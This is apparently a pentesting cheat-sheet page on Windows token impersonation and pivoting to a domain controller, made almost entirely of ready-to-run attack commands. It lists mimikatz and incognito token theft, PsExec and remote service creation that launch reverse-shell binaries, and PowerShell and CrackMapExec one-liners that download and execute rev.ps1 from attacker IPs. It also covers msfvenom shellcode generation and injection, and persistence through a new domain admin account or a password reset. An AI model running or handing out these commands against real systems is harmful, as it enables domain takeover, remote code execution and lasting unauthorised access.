Impersonating token & pivot

need elevated admin

Lateral Movement – Token Impersonation - Juggernaut-SecJuggernaut Pentesting Blog - A blog to help others achieve their goals in Cyber Security.

incognito impersonate

.\incognito.exe list_tokens -u (find domain\admin delegation token)
.\incognito.exe execute -c "domain\admin" .\shell.exe

>> with domain admin shell, pivot to DC

Incognito v2.0 Releasedlabs.withsecure.com

mimikatz impersonate

.\mimikatz.exe " " " " "exit"
privilege::debug
token::list (to find any domain admin)
token::elevate /domainadmin (seek and impersonate any domain admin that it can find)
token::run /process:"C:\temp\shell.exe"

>> with domain admin shell, pivot to DC

pivoting

Create domain admin account as a DC admin / admin on DC ser so that no need the actual DC admin creds for persistence,

or change password net user adminuser pass123! /domain

smb (with dc user/admin creds)

dir \\DC01\c$ (to check if have access to dc)

PSexec.exe \\DC01 (-s) -c C:\temp\rev.exe -d -accepteula

sc pivot (smb) - DC admin

create service on the remote ser and start

query, stop, start, delete, and add system services

copy C:\temp\shell.exe \\DC01\C$\Windows\temp

sc \\DC01 create pivot binpath= "C:\Windows\temp\shell.exe"
sc \\DC01 start pivot

powershell - DC admin

$dcs = NEW-PSSession -Computer SANDBOXDC
Invoke-Command -Session $dcs -ScriptBlock {ipconfig}
(validate we can exec cmd to DC remotely)

Copy-Item "C:\Users\Public\shell.exe" -Destination "C:\Users\Public\" -ToSession $dcs

*setup listener

$dcs = NEW-PSSession -Computer SANDBOXDC
Invoke-Command -Session $dcs -ScriptBlock {C:\Users\Public\shell.exe}

alt

(normal to hang)
Invoke-Command -ComputerName dc.domain.local -ScriptBlock {hostname}
Invoke-Command -ComputerName dc.domain.local -ScriptBlock {iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')}

or download shell.exe and then exec

CME with local admin hash (from HKLM SAM SYS :LMHASH) to impersonate domain admin for accessing dc with rev.ps1

(-p pwd; look for TOKEN=# domainadmin token)
crackmapexec smb 172.16.1.100 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -M impersonate -o MODULE=list

(-p pwd; token# look for domainadmin)
crackmapexec smb 172.16.1.100 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -M impersonate -o MODULE=exec TOKEN=4 EXEC="powershell.exe -c Invoke-Command -ComputerName Juggernaut-DC.juggernaut.local -ScriptBlock {hostname}"

crackmapexec smb 172.16.1.100 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -M impersonate -o MODULE=exec TOKEN=4 EXEC="powershell.exe -c Invoke-Command -ComputerName Juggernaut-DC.juggernaut.local -ScriptBlock {iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')}"

(normal to hang)

DC Admin impersonation (not yet pivot)


crackmapexec smb 172.16.1.100 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -M impersonate -o MODULE=exec TOKEN=4 EXEC=whoami

crackmapexec smb 172.16.1.100 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -M impersonate -o MODULE=exec TOKEN=4 EXEC="powershell.exe -c iex(new-object net.webclient).downloadstring('http://172.16.1.30/rev.ps1')"

alt

msfvenom -p windows/shell/reverse_tcp LHOST=192.168.119.173 LPORT=80 -e x86/shikata_ga_nai -i 7 -f raw -o shell.bin

crackmapexec smb 10.0.5.1 -u Administrator -p P@ss123 --local-auth -M shellcode_inject -o PATH=/path/to/shell.bin

-H nthash
-d domain.local / .

Invoke-TokenManipulation.ps1 (not yet pivot)

. .\Invoke-TokenManipulation.ps1
Invoke-TokenManipulation -Enumerate
Invoke-TokenManipulation -ImpersonateUser -Username "lab\domainadminuser"
Invoke-TokenManipulation -ImpersonateUser -Username "NT AUTHORITY\SYSTEM"

Get-Process wininit | Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/rev.ps1');\"};"


Invoke-TokenManipulation -CreateProcess "C:\shell.exe" -Username "nt authority\system"

Invoke-TokenManipulation -CreateProcess "Powershell.exe -nop -exec bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://10.7.253.6:82/rev.ps1');\";" -Username "nt authority\system"

or download shell.exe and then exec

PreviousPassword hash dump and reuse NextPersisting access with DC admin

Last updated 2 years ago